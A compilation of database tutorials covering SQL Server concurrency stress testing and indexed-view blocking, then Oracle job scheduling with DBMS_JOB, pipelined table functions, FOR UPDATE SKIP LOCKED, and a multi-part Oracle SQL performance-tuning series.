Next, uncomment the hint in both tabs and rerun the scripts; in this particular case, with the help of the HOLDLOCK hint, MERGE holds up under high concurrency perfectly well. Of course, this does not mean that we can always use this new command without stress testing. However, it means that we should at least consider using it whenever we INSERT or UPDATE under high concurrency.

For example, we can consider rewriting our UpdateWebPageStats stored procedure using the MERGE command, as well as exposing this new version of the procedure to the same thorough testing. This is left as an advanced exercise.

One final comment: in the examples in this article we only stress test how one stored procedure runs from multiple connections. In real life, this might not be good enough. If we have two different stored procedure modifying the same table, and if it is possible than these different modules will try to modify the same data concurrently, then we need to include such cases in our stress testing.
Creating New Objects may hurt Concurrency
In some cases, when we create an index, an indexed view, or a trigger, we may introduce serious issues, such as blocking or deadlocks. Let me provide an example of how creating an indexed view increases the probability of blocking and deadlocks. Consider the table, ChildTable, shown in Listing 28.

CREATE TABLE dbo.ChildTable

(

ChildID INT NOT NULL ,

ParentID INT NOT NULL ,

Amount INT NOT NULL ,

CONSTRAINT PK_ChildTable PRIMARY KEY ( ChildID )

) ;

Listing 28: Creating the ChildTable table.

Let’s subject our table to concurrent modification. In one tab, run the script in Listing 29.
BEGIN TRAN ;

INSERT INTO dbo.ChildTable

( ChildID, ParentID, Amount )

VALUES ( 1, 1, 1 ) ;

– ROLLBACK TRAN ;

Listing 29: The modification to run in the first tab
In the second tab, run the script in Listing 30.

BEGIN TRAN ;

INSERT INTO dbo.ChildTable

( ChildID, ParentID, Amount )

VALUES ( 2, 1, 1 ) ;

ROLLBACK TRAN ;

Listing 30: The modification to run in the second tab

The second modification completes right away. Return to the first tab and rollback the transaction. As we have seen, these two modifications do not block each other. However, what happens if we create an indexed view, based on our table, as shown in Listing 31.
CREATE VIEW dbo.ChildTableTotals WITH SCHEMABINDING

AS

SELECT ParentID,

COUNT_BIG(*) AS ChildRowsPerParent,

SUM(Amount) AS SumAmount

FROM dbo.ChildTable

GROUP BY ParentID ;

GO

CREATE UNIQUE CLUSTERED INDEX ChildTableTotals_CI

ON dbo.ChildTableTotals(ParentID) ;

Listing 31: Create the indexed view
Rerun script 10-29 followed by 10-30. This time the script 10-30 will not complete; it will be blocked by the script 10-29, because both modifications also need to modify the same row in the indexed view, and so script 10-30 is waiting for an exclusive lock on the view. Return to the first tab and rollback or commit the transaction to release the locks, and the script 10-35 will complete right away.
Similarly, creating new indexes or triggers may affect concurrent modifications. This means that if we stress test modules to determine how they handle concurrency, we may need to repeat stress testing when we add new indexes, indexed views, or triggers.
Of course, not all indexed views, indexes and so on will cause such blocking, and there are no general rules, which is why I stress the need to test on a case-by-case basis.
Conclusion
We have seen that when modifications run concurrently from multiple connections, we may end up with inconsistent results or errors. We also investigated two T-SQL patterns that are in common use, and yet can fail under high concurrency, resulting either in lost updates or in blocking or deadlocks.
We have investigated several approaches, both pessimistic and optimistic, for avoiding lost updates and, for SQL Server 2008 users, demonstrated how MERGE can improve the robustness of our code.

The most important point of this article is this: our modules need to be concurrency-proof. We need to expose our modules to concurrency during stress testing, expose vulnerabilities in our code and proactively fix them.
Hopefully, this article, like the entire book, has served not only to provide several techniques that will make your code more robust, but also as an eye-opener as to just what situations your database code has to contend with, when deployed on a live, production system. I haven’t covered every possible case of what can go wrong; that would be impossible. Hopefully, however, the common cases that have been covered will prove useful in making your code more robust; when a defensive programmer becomes aware of a frailty in one case, he or she knows that very careful testing will be needed in other, similar, cases.
More generally, however, I hope I’ve convinced you that we, as SQL Server programmers, need to be proactive and creative in our testing. After all, “a hard drill makes an easy battle”.

Scheduling Jobs Using Oracle’s Job Queue

From:http://www.lifeaftercoffee.com/2006/01/23/scheduling-jobs-using-oracles-job-queue/

Oracle database offers a job queue for scheduling certain operations to happen routinely in a database. The functionality is similar to UNIX cron jobs with the primary difference being if your database is not running, the job will not attempt to run.

Scheduling is accomplished through the DBMS_JOB package which is provided by Oracle. While nearly anything can be scheduled, my rule of thumb is to use this only for things which happen exclusively within the database. For tasks which involve manipulating files at the operating system level I still prefer cron.

Oracle will start a coordinator job queue (CJQ0) process to handle scheduled jobs. The CJQ0 process will keep track of the schedule and start helper processes (J000 – J999) to execute the scheduled jbos.

This is being written for use with Oracle Database 9i, but will likely work in most of the recent revisions. As always, consult the documentation for your release before attempting any of this.

Setting the database up for job execution:

Before we can schedule job execution we need to make sure the database is set up to process jobs.

The first thing we need to do is check the number of job queue processes available to execute jobs. For that we check the job_queue_processes initialization parameter.

SQL> show parameter job_queue_processes

NAME TYPE VALUE
———————————— ———– ——————————
job_queue_processes integer 100

This parameter should be set higher than the maximum number of simultaneous jobs you expect to run (the limit is 1000). Some jobs may require more than one process, so headroom is important.

If this parameter is set to 0 jobs will not be processed. If you wish to start processing jobs the parameter can be set dynamically with the ALTER SYSTEM command.

ALTER SYSTEM SET job_queue_processes = 100;

This command enables job queue processing by starting the CJQ0 process. Similarly, you can disable all job queue processing and stop the CJQ0 process by setting the parameter to 0.

ALTER SYSTEM SET job_queue_processes = 0;

Changes to the parameter with the ALTER SYSTEM command will only be in effect until the database is restarted. Make sure you change them in your init or spfile if you want the changes to be permanent.

Submitting a job to the queue

The procedure DBMS_JOB.SUBMIT is called to submit a new job to the queue. The procedure is called in the following format:

BEGIN
dbms_job.submit(JOB => :jobnumber, — (this is a return variable, not a supplied number)
WHAT => ‘code to execute’,
NEXT_DATE => first_execution_date,
INTERVAL => next_execution_date);
commit;
END;
/

An example should make things a little more clear:

VARIABLE jobnumber number
BEGIN
DBMS_JOB.SUBMIT(JOB => :jobnumber,
WHAT => ‘DBMS_STATS.GATHER_DATABASE_STATS(options => ”GATHER AUTO”);’,
NEXT_DATE => to_date(’11:30 01/23/06′,’HH24:MI MM/DD/YY’),
INTERVAL => ‘SYSDATE + 1′);
COMMIT;
END;
/
print jobnumber

JOBNUMBER
———-
21

Here we see a complete job submission. First we set up a variable to hold the job number which will be assigned automatically and returned by the procedure. We then begin a PL/SQL block and call the DBMS_JOB.SUBMIT command.

The JOB parameter will be the variable which will be populated with the job number. If you need to alter or delete a job in the future it will be easiest to find by job number.

The WHAT parameter is the code to be executed. This could be a simple statement or (as in our example) a call to another procedure or function. Note that the parameters for the procedure we’re calling must be in two single quotes so the single quotes are interpreted correctly.

The NEXT_DATE parameter specifies the first time this job should be run. This can be any valid Oracle date. Here we are telling it to run January 23 at 11:30 am.

If NEXT_DATE is not in the future you may run into problems, so it may be better to use a formula for NEXT_DATE. Anything that evaluates to a valid Oracle date is fair game.

Finally we specify INTERVAL, the way to calculate how often we want the job to run at. This is a date string which will be evaluated each time the job is run. Here SYSDATE + 1 will be evaluated to once a day. SYSDATE + .5 would cause the job to execute every 12 hours, or SYSDATE + 7 would cause it to run once a week. Any formula can be used here as long as it evaluates to a date.

The best way to assure a job will run at a specific time every day is to truncate the date and add a number of hours to it. I have explained this in greater detail in a separate article Getting a Specific Time of Day in Oracle.

If NULL is specified instead of an interval the job will be run once at the specified first execution time then be removed from the job queue.

The commit here is important to assure the newly created job will run. We then end the PL/SQL block and execute it. For future reference we print the jobnumber variable.

Now this job will be executed at 11:30am on 1/23/06 and every 24 hours after that.

Viewing the job queue

Oracle provides four useful views of the job queue.

DBA_JOBS lists information on all the jobs in the database.

ALL_JOBS has the same information as DBA_JOBS but only on jobs which are accessible tot he current user.

USER_JOBS again has the same job information, but will only list jobs owned by the current user.

DBA_JOBS_RUNNING contains information on all jobs currently running in the database. This view can be joined with the other views for detailed information on running jobs.

Running a job manually

While the point is to automate jobs, occasionally you may find you need to run a job manually. To do this you can call the RUN procedure. This is especially useful if you need to run a job which has been marked as broken.

BEGIN
DBMS_JOB.RUN(JOB => 21);
END;
/

Note: if you use DBMS_JOB.RUN to manually execute a job the value for NEXT_DATE will be updated based on the current date and time and your formula. This becomes important if you have a job running at, say 11:00 pm with an interval of SYSDATE + 1, but then you run it manually at 3:45pm, the next_date will be recalculated at that time and it will now be run at 3:45pm each day.

How to tell if a job has failed

When a database job fails an error will be written to the Oracle alert log with the error number of ORA-12012 and will include the job number which failed. Jobs could fail for a variety of reasons but most common are missing or altered objects or insufficient privileges to execute.

If a job fails to execute after 16 attempts Oracle will mark it as broken and stop attempting to run it. This will be indicated by a ‘Y’ in the BROKEN column of the dba_jobs view. If you want to tell Oracle to not run a job you can manually mark it as broken by executing the following:

BEGIN
DBMS_JOB.BROKEN(JOB => 21, BROKEN => TRUE);
END;
/

The job will remain broken and will not be run until you either force it to run or mark it as not broken. When marking it as not broken you must also specify the next date for the job to run. The following will mark job 21 as not broken and have it execute at 11:00pm on January 23.

BEGIN
DBMS_JOB.BROKEN(JOB => 21, BROKEN => FALSE, NEXT_DATE => TO_DATE(’23:00 01/23/06′, ‘HH24:MI MM/DD/YY’));
END;
/

Changing a job

You can update a job with the DBMS_JOB.CHANGE procedure. This procedure takes job number, code, next date and interval, in that order, as conditions. Whatever you don’t want to change can be passed as NULL.

With that in mind, the command to change just the interval would look something like this:

BEGIN
DBMS_JOB.CHANGE(JOB => 21, WHAT => NULL, NEXT_DATE => NULL, INTERVAL => ‘SYSDATE + 7′);
END;
/

This would change job number 21 to execute every 7 days. The previous value is discarded.

Removing a job

To remove a job from the job queue you will need the job number. If you’re not sure what it is you should be able to find it by querying one of the views listed above.

Once you have the job number, run the following command.

BEGIN
DBMS_JOB.REMOVE(JOB => 21);
END;
/

This will remove the job and it will not be executed again. You can only remove jobs that you own. If this is run while the job is executing it will not be interrupted, but will not be run again.

oracle, database, database administration, database development

Oracle Pipelined Table Functions

 

 

Oracle Pipelined Table Functions


 

 

Overview

Basically, when you would like a PLSQL (or java or c) routine to be the «source»
of data — instead of a table — you would use a pipelined function.

PIPELINED functions will operate like a table.

A PL/SQL function may be used in a data warehouse database to transform large amounts of data. This might also involve massaging the data in a series of transformations, each performed by different functions. Prior to Oracle Database 9, large transformations required either significant memory overhead, or storing the data in intermediate tables between each stage of the transformation. The loading process caused immense performance degradations in both cases.

 

 

Using PL/SQL table functions can significantly lower the over-head of doing such transformations. PL/SQL table functions accept and return multiple rows, delivering them as they are ready rather than all at once, and can be made to execute as parallel operations.

Simple Example – Generating Some Random Data

How could you create six unique random numbers between 1 and 49 with one SQL statement?

We would generate the set of numbers to pick from (see the innermost query that follows); any table with 49 or more records would do it. First the quick-and-dirty solution without a pipelined function.

select r
  from (select r
           from (select rownum r
                   from all_objects
                  where rownum < 50)
          order by dbms_random.value)
  where rownum <= 6;

         R
———-
        10
         2
        19
        34
        12
        21

That query works by generating the numbers 1 .. 49, using the inline view. We wrap that innermost query as an inline view and sort it by a random value, using DBMS_RANDOM.VALUE. We wrap that result set in yet another inline view and just take the first six rows. If we run that query over and over, we’ll get a different set of six rows each time.

This sort of question comes up frequently—maybe not about how to generate a set of six random numbers but rather, “how can we get N rows?” For example, we’d like the inclusive set of all dates between 25-FEB-2004 and 10-MAR-2004. The question becomes how to do this without a “real” table, and the answer lies in Oracle9i/10g with its PIPELINED function capability. We can write a PL/SQL function that will operate like a table. We need to start with a SQL collection type; this describes what the PIPELINED function will return. In this case, we are choosing a table of numbers; the virtual table we are creating will simply return the numbers 1, 2, 3, … N:

create type array
    as table of number
/

Type created.

Next, we create the actual PIPELINED function. This function will accept an input to limit the number of rows returned. If no input is provided, this function will just keep generating rows for a very long time (so be careful and make sure to use ROWNUM or some other limit in the query itself!). The PIPELINED keyword on line 4 allows this function to work as if it were a table:

create function
  gen_numbers(n in number default null)
  return array
  PIPELINED
  as
  begin
     for i in 1 .. nvl(n,999999999)
     loop
         pipe row(i);
     end loop;
     return;
  end;
/

Function created.

Suppose we needed three rows for something. We can now do that in one of two ways:

select * from TABLE(gen_numbers(3));

 COLUMN_VALUE
 ————
           1
           2
           3

or

select * from TABLE(gen_numbers)
 where rownum <= 3;

 COLUMN_VALUE
 ————
           1
           2
           3

Now we are ready to re-answer the original question, using the following functionality:

select *
  from (
  select *
    from (select * from table(gen_numbers(49)))
  order by dbms_random.random
  )
where rownum <= 6
/

 COLUMN_VALUE
 ————
          47
          42
          40
          15
          48
          23

We can use this virtual table functionality for many things, such as generating that range of dates:

select to_date(’25-feb-2004′)+
        column_value-1
  from TABLE(gen_numbers(15))
/

TO_DATE(‘
———
25-FEB-04
26-FEB-04
27-FEB-04
28-FEB-04
29-FEB-04
01-MAR-04
02-MAR-04
03-MAR-04
04-MAR-04
05-MAR-04
06-MAR-04
07-MAR-04
08-MAR-04
09-MAR-04
10-MAR-04

Note the name of the column we used: COLUMN_VALUE. That is the default name for the column coming back from the PIPELINED function.

Typical Pipelined Example

This are the typical steps to perform when using PL/SQL Table Functions:

  • The producer function must use the PIPELINED keyword in its declaration.
     
  • The producer function must use an OUT parameter that is a record, corresponding to a row in the result set.
     
  • Once each output record is completed, it is sent to the consumer function through the use of the PIPE ROW keyword.
     
  • The producer function must end with a RETURN statement that does not specify any return value.
     
  • The consumer function or SQL statement then must use the TABLE keyword to treat the resulting rows from the PIPELINE function like a regular table.

The first step is to define the format of the rows that are going to be returned. In this case here, we’re going to return a INT, DATE followed by a VARCHAR2(25).

CREATE OR REPLACE TYPE myObjectFormat 
AS OBJECT
(
  A   INT,
  B   DATE,
  C   VARCHAR2(25)
)
/

Next a collection type for the type previously defined must be created.

CREATE OR REPLACE TYPE myTableType
 
 AS TABLE OF myObjectFormat
/

Finally, the producer function is packaged in a package. It is a pipelined function as indicated by the keyword pipelined.

CREATE OR REPLACE PACKAGE myDemoPack
AS
      FUNCTION prodFunc RETURN myTableType PIPELINED;
END;
/

CREATE OR REPLACE PACKAGE BODY myDemoPack AS
FUNCTION prodFunc RETURN myTableType PIPELINED IS
BEGIN
  FOR i in 1 .. 5
    LOOP
      PIPE ROW (myObjectFormat(i,SYSDATE+i,’Row ‘||i));
    END LOOP;
    RETURN;
  END;
END;
/

Test It:

ALTER SESSION SET NLS_DATE_FORMAT=’dd.mm.yyyy’;
SELECT * FROM TABLE(myDemoPack.prodFunc());

         A B          C
———- ———- ———
         1 31.05.2004 Row 1
         2 01.06.2004 Row 2
         3 02.06.2004 Row 3
         4 03.06.2004 Row 4
         5 04.06.2004 Row 5

Conclusion

Pipelined functions are useful if there is a need for a data source other than a table in a select statement.

Update SKIP LOCKED

How to Acquire a Lock without Handling Exceptions

Overview

Normally we use FOR UPDATE NOWAIT to acquire a lock on rows. This statement either locks all the selected rows or the control is returned without acquiring any lock (i.e. even on rows which are available for locking) after throwing an exception.

For Update SKIP LOCKED

But there is an feature in Oracle Database, the clause FOR UPDATE SKIP LOCKED, which can be used to lock rows that are available for locking and skip the rows that have been locked by other sessions. This statement returns the control back without throwing an exception, even if all the rows are locked by another session.

To illustrate, we open two sessions. In the first session, we lock the row with deptno as 10 using FOR UPDATE NOWAIT.

SELECT * FROM dept
WHERE deptno = 10
FOR UPDATE NOWAIT;

DEPTNO DNAME LOC
———- ————– ————-
10 ACCOUNTING NEW YORK

In the second session, we try to lock two rows (deptno 10 and 20) from the table dept using FOR UPDATE NOWAIT. An exception is thrown after executing the following statement because one of the row (i.e. deptno 10) out of the selected list is already locked by session 1.

SELECT * FROM dept
WHERE deptno IN (10,20)
FOR UPDATE NOWAIT;

SELECT * FROM dept WHERE deptno IN (10,20)
FOR UPDATE NOWAIT
ERROR at line 1:
ORA-00054: resource busy and acquire with NOWAIT specified

Now we again try to lock two rows (deptno(s) 10 and 20) from the table dept but using the clause FOR UPDATE SKIP LOCKED instead of FOR UPDATE NOWAIT. As you can see the following statement has

1. returned the control without throwing an exception
2. acquired lock on the row (i.e. deptno 20) which is available for locking
3. skipped the row (i.e. deptno 10) that has been locked already by session 1

SELECT * FROM dept
WHERE deptno IN (10,20)
FOR UPDATE SKIP LOCKED;

DEPTNO DNAME LOC
———- ————– ————-
20 RESEARCH DALLAS

Oracle Performance Tuning-By Steve Callan

<From http://www.databasejournal.com/>

Part1:

Performance tuning is a broad and somewhat complex topic area when it comes to Oracle databases. Two of the biggest questions faced by your average DBA concern where to start and what to do. All you may know is that someone (a user) reports a problem about a slow or poor performing application or query. Where do you even begin to start when faced with this situation?

Oracle’s Approach to Tuning

For anyone who has taken the Performance Tuning exam for Oracle8i certification, one of the testable areas dealt with Oracle’s Tuning Methodology. Oracle’s emphasis on this particular methodology changed when Oracle9i was released. The approach has gone from top-down in 8i to that of following principles in 9i/10g. Neither methodology is absolute as each has its advantages and disadvantages. In Oracle8i, the steps consisted of the following:

1.  Tuning the Business Rules
2.  Tuning the Data Design
3.  Tuning the Application Design
4.  Tuning the Logical Structure of the Database
5.  Tuning Database Operations
6.  Tuning the Access Paths
7.  Tuning Memory Allocation
8.  Tuning I/O and Physical Structure
9.  Tuning Resource Contention
10. Tuning the Underlying Platform(s)

With Oracle9i’s principle-based approach, the principles, in order of priority, are:

Priority Description
First Define the problem clearly and then formulate a tuning goal.
Second Examine the host system and gather Oracle statistics.
Third Compare the identified problem to the common performance problems identified by Oracle in the Oracle9i Database Performance Methods (Release 1)/Database Performance Planning (Release 2)
Fourth Use the statistics gathered in the second step to get a conceptual picture of what might be happening on the system.
Fifth Identify the changes to be made and then implement those changes.
Sixth Determine whether the objectives identified in step one have been met. If they have, stop tuning. If not, repeat steps five and six until the tuning goal is met.

Reference: OCP: Oracle9i Performance Tuning Study Guide, SYBEX, Inc.

Interestingly, the emphasis on identifying which step an action falls under went away with Oracle9i, and recitation of the principles is not a testable item. The title of documentation even changed between releases one and two, and that should send a clear signal that the art of performance tuning (or, performance and tuning) is still just that – an art. When it comes to instance tuning, the steps are even further reduced in Oracle10g.

The performance tuning guide for Oracle10g (Release 2) identifies the overall process as The Oracle Performance Improvement Method. The steps have been expanded, but overall, remain the same.

1.  Perform the following initial standard checks:

a.   Get candid feedback from users. Determine the performance project’s scope and subsequent performance goals, as well as performance goals for the future. This process is key in future capacity planning.

b.  Get a full set of operating system, database, and application statistics from the system when the performance is both good and bad. If these are not available, then get whatever is available. Missing statistics are analogous to missing evidence at a crime scene: They make detectives work harder and it is more time-consuming.

c.   Sanity-check the operating systems of all machines involved with user performance. By sanity-checking the operating system, you look for hardware or operating system resources that are fully utilized. List any over-used resources as symptoms for analysis later. In addition, check that all hardware shows no errors or diagnostics.

2.  Check for the top ten most common mistakes with Oracle, and determine if any of these are likely to be the problem. List these as symptoms for later analysis. These are included because they represent the most likely problems. ADDM automatically detects and reports nine of these top ten issues. See Chapter 6, “Automatic Performance Diagnostics” and “Top Ten Mistakes Found in Oracle Systems”.

3.  Build a conceptual model of what is happening on the system using the symptoms as clues to understand what caused the performance problems. See “A Sample Decision Process for Performance Conceptual Modeling”.

4.  Propose a series of remedy actions and the anticipated behavior to the system, then apply them in the order that can benefit the application the most. ADDM produces recommendations each with an expected benefit. A golden rule in performance work is that you only change one thing at a time and then measure the differences. Unfortunately, system downtime requirements might prohibit such a rigorous investigation method. If multiple changes are applied at the same time, then try to ensure that they are isolated so that the effects of each change can be independently validated.

5.  Validate that the changes made have had the desired effect, and see if the user’s perception of performance has improved. Otherwise, look for more bottlenecks, and continue refining the conceptual model until your understanding of the application becomes more accurate.

6.  Repeat the last three steps until performance goals are met or become impossible due to other constraints.

The performance tuning guide for Oracle10g (Release 2)

The Change is Part of the Problem

The change from a top-down structured approach to a principle-based “make it stop hurting” one is part of the problem. Gathering statistics is obviously important because how else do you know if you have improved (or worsened) the problem? Still, to some degree with either approach, you are left with the original two questions: what do I look for, and how do I make it better? If the structured approach left you scratching your head, the principled approach only adds to the confusion.

What would help the novice tuner (disclaimer: I am far from being an expert) is a list of items or areas to evaluate (configure, diagnose, and tune) in each of the following areas:

  • Tuning the Buffer Cache
  • Tuning the Redo Log Buffer
  • Tuning the Shared Pool Memory
  • Tuning the Program Global Area
  • Optimizing Data Storage
  • Optimizing Tablespaces
  • Tuning Undo Segments
  • Detecting Lock Contention
  • Tuning SQL

These areas pretty much cover the Oracle RDBMS and instance from top to bottom. The remainder of this article will focus on tuning SQL, or more precisely, preventing slow SQL execution. Aren’t these the same thing? Mostly yes, but a common approach in development is making a statement perform well enough or fast enough. Each and every statement does not have to be optimal, but some thought has to go into coding them. You do not have the time to optimize hundreds or even thousands of SQL statements, but at the same time, there are guidelines you can follow to avoid common mistakes and bad coding.

17 Tips for Avoiding Problematic Queries

The source of these 17 tips is from Oracle9i Performance Tuning: Optimizing Database Productivity by Hassan Afyouni (Thompson Course Technology, 2004). These tips provide a solid foundation for two outcomes: making a SQL statement perform better, and determining that nothing else can be done in this regard (i.e., you have done all you can with the SQL statement, time to move on to another area).

The 17 tips are listed below.

1.  Avoid Cartesian products
2.  Avoid full table scans on large tables
3.  Use SQL standards and conventions to reduce parsing
4.  Lack of indexes on columns contained in the WHERE clause
5.  Avoid joining too many tables
6.  Monitor V$SESSION_LONGOPS to detect long running operations
7.  Use hints as appropriate
8.  Use the SHARED_CURSOR parameter
9.  Use the Rule-based optimizer if I is better than the Cost-based optimizer
10. Avoid unnecessary sorting
11. Monitor index browning (due to deletions; rebuild as necessary)
12. Use compound indexes with care (Do not repeat columns)
13. Monitor query statistics
14. Use different tablespaces for tables and indexes (as a general rule; this is old-school somewhat, but the main point is reduce I/O contention)
15. Use table partitioning (and local indexes) when appropriate (partitioning is an extra cost feature)
16. Use literals in the WHERE clause (use bind variables)
17. Keep statistics up to date

That is quite a list and overall is thorough and accurate. Step 9, referring to the use of the Rule-based optimizer, may cause a reliance or dependency on a feature Oracle has identified as a future item to be deprecated. You are eventually going to have to solve the problem using the CBO, so you may as well start now and forget about the RBO. Step 14 should be changed to something along the lines of “reduce I/O contention” instead of its currently stated “separate index and table tablespaces” guidance.

In Closing

In the next article of this series, we will look at some specific steps of these tips. For example, advice given on many Web sites about how to improve a SQL statement’s performance typically includes “use bind variables.” Well, I am sure many people have this question: “How, exactly, do I do that?” It is actually pretty simple, as are many of the details of how to use many of these tips.

Part2:

As mentioned in Part 1, there are several relatively easy steps you can take to improve performance. From the user’s perspective, one of the most frequently used interfaces with a database involves SQL statements, so getting a handle on them is a good place to start in terms of being able to see an immediate improvement.

In the interest of being complete, I will cover some preliminary steps that will be needed in order to view what is taking place. These steps include running the plustrce SQL script, creating an “EXPLAIN_PLAN” table, granting a role, and configuring your SQL*Plus environment to see execution plans. All of these steps are covered in “Using Autotrace in SQL*Plus” in Oracle9i Database Performance Tuning Guide and Reference Release 2 (9.2). For Oracle10g, the steps are covered in “Tuning SQL*Plus” in SQL*Plus® User’s Guide and Reference Release 10.2.

Preliminary Steps

If the PLUSTRACE role does not exist, create it using the PLUSTRCE SQL script found in ORACLE_HOME\sqlplus\admin. The script is pretty simple:

drop role plustrace;
create role plustrace;

grant select on v_$sesstat to plustrace;
grant select on v_$statname to plustrace;
grant select on v_$mystat to plustrace;
grant plustrace to dba with admin option;

Check for the role using:

SQL> select role from dba_roles where role = 'PLUSTRACE';

ROLE
----------------
PLUSTRACE

The user must have (or have access to) a PLAN_TABLE (it can named something else, but for now, the “default” name is fine). This table is created using the UTLXPLAN SQL script found in ORACLE_HOME\rdbms\admin.

SQL> show user
USER is "SYSTEM"
SQL> @?\rdbms\admin\utlxplan

Table created.

SQL> create public synonym plan_table for system.plan_table;

Synonym created.

SQL> grant select, update, insert, delete on plan_table to <your user name>;

Grant succeeded.

SQL> grant plustrace to <your user name>;

Grant succeeded.

The user for these examples is HR (found in the sample schemas provided by Oracle).

SQL> conn hr/hr
Connected.
SQL> set autotrace on
SQL> select * from dual;

D
-
X

With autotrace set to on, you can confirm your ability to see an execution plan and some statistics. You should see output similar to the following:

Execution Plan
----------------------------------------------------------
   0    SELECT STATEMENT Optimizer=ALL_ROWS (Cost=2 Card=1 Bytes=2)
   1    0 TABLE ACCESS (FULL) OF 'DUAL' (TABLE) (Cost=2 Card=1 Bytes=2)

Statistics
----------------------------------------------------------
         24  recursive calls
          0  db block gets
          6  consistent gets
          1  physical reads
          0  redo size
        389  bytes sent via SQL*Net to client
        508  bytes received via SQL*Net from client
          2  SQL*Net roundtrips to/from client
          0  sorts (memory)
          0  sorts (disk)
          1  rows processed

To suppress the results of the query, use “traceonly” in the set statement.

Using Bind Variables

On any number of DBA help type of Web sites, a frequently seen bit of advice is to use bind variables, but rarely are the steps or instructions for this step included. Here is a simple way to create and use a bind variable.

SQL> variable department_id number
SQL> begin
  2  :department_id := 80;
  3  end;
  4  /

PL/SQL procedure successfully completed.

SQL> print department_id

DEPARTMENT_ID
-------------
           80

Now let’s make a comparison between querying for employee ID and name with and without the bind variable (with the output turned off using traceonly).

Now let’s use the bind variable.

Okay, so the difference isn’t that great (the cost went from 3 to 2), but this was a small example (the table only has 107 rows). Is there much of a difference when working with a larger table? Use the SH schema and its SALES table with its 900,000+ rows.

SQL> select prod_id, count(prod_id)
  2  from sales
  3  where prod_id > 130
  4  group by prod_id;

Same query, but this time using a bind variable.

SQL> variable prod_id number
SQL> begin
  2  :prod_id := 130;
  3  end;
  4  /

PL/SQL procedure successfully completed.

SQL> print prod_id

   PROD_ID
----------
       130

SQL> select prod_id, count(prod_id)
  2  from sales
  3  where prod_id > :prod_id
  4  group by prod_id;

The cost went from 540 to 33, and that is fairly significant. One of the main benefits is that the query using the bind variable, that is, the work done parsing the query, stays the same each and every time. All you have to do is substitute a new value for the variable.

Use Efficient SQL

Suppose you have a choice between the following two queries (using the HR schema again):

Query 1

select d.department_id, 
 d.department_name, 
 r.region_name
from departments d, 
 locations l, 
 countries c, regions r
where d.location_id=l.location_id
and l.country_id=c.country_id
and c.region_id=r.region_id;

and

select department_id, 
 department_name, 
 region_name
from departments natural join locations
natural join countries natural join regions;

This leads to four questions.

1.  Are these queries querying for the same result set?

2.  If they are the same, would you expect any difference in their execution plans?

3.  If the plans are the same, what is it that makes these queries different?

4.  Can anything be done to improve the cost?

The answer to the first question is yes, they are the same. The answer to the second question is no, not really, because the same steps are involved in terms of joining tables. The answer to the third question has to do with the amount of typing or coding involved.

The use of the “natural join,” “join on” and “right/left outer join” keywords is what matters in this example. If you understand what a natural join is (still joining two tables, but the column names involved are the same), doesn’t it look easier to use the second query?

The proof of the answer to the second question is shown below.

Query 1′s Execution Plan

Query 2′s Execution Plan

As for the answer to the last question, efficient SQL can mean different things to different people. In this case, what about using a view? Will the cost be any different from either of the original queries (you can see for yourself what the answer is), or are there other considerations to take into account?

Suppose we have a view named cost_example, created as follows:

create or replace view cost_example
as
select department_id, department_name, region_name
from departments natural join locations
natural join countries natural join regions;

Let’s look at a record in the view.

SQL> select department_id, department_name, region_name
  2  from cost_example
  3  where department_id=70;

DEPARTMENT_ID DEPARTMENT_NAME                REGION_NAME
------------- ------------------------------ ------------
           70 Public Relations               Europe

Out of the three columns or fields, can any of them be changed? If so, why? If not, why not?

Let’s suppose the region name is now Asia instead of Europe.

SQL> update cost_example
  2  set region_name = 'Asia'
  3  where region_name = 'Europe';
set region_name = 'Asia'
    *
ERROR at line 2:
ORA-01779: cannot modify a column which maps to a non key-preserved table

Can the department name be changed?

SQL> update cost_example
  2  set department_name = 'PR'
  3  where department_name = 'Public Relations';

1 row updated.

The reason why the record in the view can be updated (the department name, anyway) is that DEPARTMENTS is a key-preserved table (its primary key DEPARTMENT_ID was used in the creation of the view).

The point of this example is this: just because you obtain the lowest cost does not mean you cannot do anything else to make a query better. Better, in this case, applies to developers using simpler join constructs, and applies to users in that providing views for their use saves you the effort of having to explain how to do complex joins. The caution on views is to keep track of key-preserved versus non key-preserved tables so that what you intend to be modifiable is indeed just that.

In Closing

The main points of this article are:

  • Use bind variables
  • Use efficient SQL
  • Use coding standards
  • Consider the technical or SQL know-how of your user population and create views as appropriate

None of these steps is especially difficult to perform or implement. For programmers used to using the “tableA.column_name = tableB.column_name” format for joins, moving to the use of natural joins saves quite a bit of typing, plus there is the benefit of having key column names match up (the foreign key column in the child table has the same column name as the primary key in the parent table). As shown, some measures may not have a big impact, but when taken as a whole, every little bit helps to improve performance. In Part 3, we will look at more examples of steps you can take to improve performance.

Part3:

As mentioned in Parts 1 and 2, there are several relatively easy steps you can take to improve performance. One of those steps involves using an automated tool to “guide” you in writing SQL statements. There are several vendors who manufacture analysis or performance tuning tools, and in the next two articles, we will look at one of them.

Quest Software

Many DBAs and developers use a tool named Toad, produced by Quest Software. According to a statement at Quest Software’s Web site, the Toad user community numbers around 500,000 users. One of Toad’s features is its ability to optimize SQL queries. In other words, Oracle Corporation does not own the market on tuning advisor type of tools.

Knowing that you have several choices with respect to advisory tools, and understanding what it is they do, what do you use them on if you are not working in a production or development environment? And perhaps just as likely, even if you are in a development environment, you may not have any bulk data to use. Generating bulk or large amounts of data is the focus of this article, and the tool we will look at for this purpose is another Quest Software product: DataFactory® for Oracle.

DataFactory

The purpose of DataFactory is to “quickly create meaningful test data for multiple database platforms.” The platforms include Oracle, DB2, Sybase and any ODBC compliant database. Normally retailing at $595 per server, a free 30-day version is available for download at Quest Software’s Web site.

To obtain the software (current version of 5.5.0), you must register using a “real” email address. Hotmail and Gmail addresses were rejected, but Comcast went through just fine. Once you register, you will receive an email that contains a key to unlock the application and start the 30-day free trial clock.

The installation process is quick and straightforward. If you are running Microsoft AntiSpyware, you may receive one or more errors. Disable the real time protection and attempt to reinstall DataFactory.

Creating Tutorial Objects

An excellent way to get to know the application is to use its tutorial objects. The general process is to:

  1. Create a project
  2. Create tables in a schema
  3. Run a script to load data

Unfortunately, an excellent way to get a refresher on disabling system-named referential constraints is to use the built-in tutorial objects. Using an iterative process, you can disable constraints one at a time until the load script runs through without error. However, while Quest is working on fixing this bug, we can take a short excursion into identifying and disabling a constraint.

After starting DataFactory, you can choose to start the tutorial. The instructions on how to load the tutorial objects (as is all help) are in HTML files.

The instructions from the help system state that the tables are populated. That is not correct. The tables (15 in all, named using a “DF_” prefix) are populated after an additional step.

